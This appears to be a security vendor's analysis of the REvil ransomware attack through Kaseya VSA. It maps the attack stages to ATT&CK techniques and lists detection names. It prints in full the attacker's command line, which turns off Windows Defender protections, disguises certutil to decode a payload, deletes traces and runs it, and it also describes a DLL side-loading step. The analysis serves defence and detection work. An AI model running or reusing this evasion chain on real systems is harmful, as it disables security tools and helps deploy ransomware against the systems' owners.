The REvil group which is assumed to be behind the attacks attacked through Kaseya’s supply chain for effective distribution. During the infection process, it used normal MS files to neutralize Windows Defender and bypass anti-malware solutions, then encrypting files discreetly.
The detailed infection information is as follows.
- Initial-Access: Supply Chain Compromise (TID: T1195)
Exploits VSA vulnerability of Kaseya to create agent.crt file (base64 encoding file) in C:\kworking folder
- Execution: Command and Scripting Interpreter (TID: 1059)
Executes powershell command by running Kaseya’s AgentMon.exe
- Defence Evasion: Impair Defenses (TID: 1562) & Masquerading (TID: 1036) & Obfuscated Files or Information (TID: 1027) & Indicator Removal on Host (TID: 1070)
|“C:\WINDOWS\system32\cmd.exe” /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe|
When such a powershell command is executed, anti-malware product V3 can detect the ransomware in advance through the behavior detection feature with the detection alias Execution/MDP.Behavior.M3792. The detailed features and explanations of the command are as follows:
- DisableRealtimeMonitoring: Disables Windows Defender’s real-time protection
- DisableIntrusionPreventionSystem: Disables Windows Defender’s download file scanning
- DisableScriptScanning: Disables Windows Defender’s script scanning
- EnableControlledFolderAccess Disabled: Allows access to controlled folders
- EnableNetworkProtection AuditMode –Force: Disables network protection mode
- MAPSReporting Disabled: Disables Microsoft Active Protection Service report
- SubmitSamplesConsent NeverSend: Disables Windows Defender’s automatic sample submission
- copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe: Copies cert.exe in normal certutil.exe windows path
- echo %RANDOM% >> C:\Windows\cert.exe: Places random bytes behind copied cert.exe file to bypass anti-malware’s certutil.exe detection
- C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe: Decrypts obfuscated file created with vulnerability (agent.crt → agent.exe)
- del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe: Deletes both obfuscated file and copied certutil.exe, then runs ultimately decrypted exe file
- Persistence: Hijack Execution Flow (TID: 1574)
The exe file creates a MS normal file (msmpeng.exe) and dll of BlueCrab features (mpsvc.dll) in the %temp% when it is executed. When msmpeng.exe is run, it calls ServiceCrtMain of mpsvc.dll. The dll created by the attacker equips ransomware features in the function, so the malicious behavior is performed by the normal msmpeng.exe that loaded the dll.
It is likely that the previous process was executed to bypass anti-malware detection with behaviors of the normal process msmpeng.exe. Besides file detection, V3 products can detect the malware with the ‘process memory scan’ feature the moment the ransomware DLL module (mpsvc.dll) is executed. MDS and EDR products can also detect BlueCrab ransomware with the same operation method without any issue.
V3 Detection Status
- Data/BIN.EncPe (2021.07.03.03)
- Ransomware/Win.Sodinokibi (2021.07.03.03)
- Ransomware/Win.REvil (2021.07.03.03)
- Execution/MDP.Behavior.M3792(Behavior Detection 2021.07.10.00)
- Ransomware/Win.BlueCrab.XM120(Memory Scan 2021.07.09.03)
[EDR Product Detection Screen]
[MDS Product Detection Status]
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.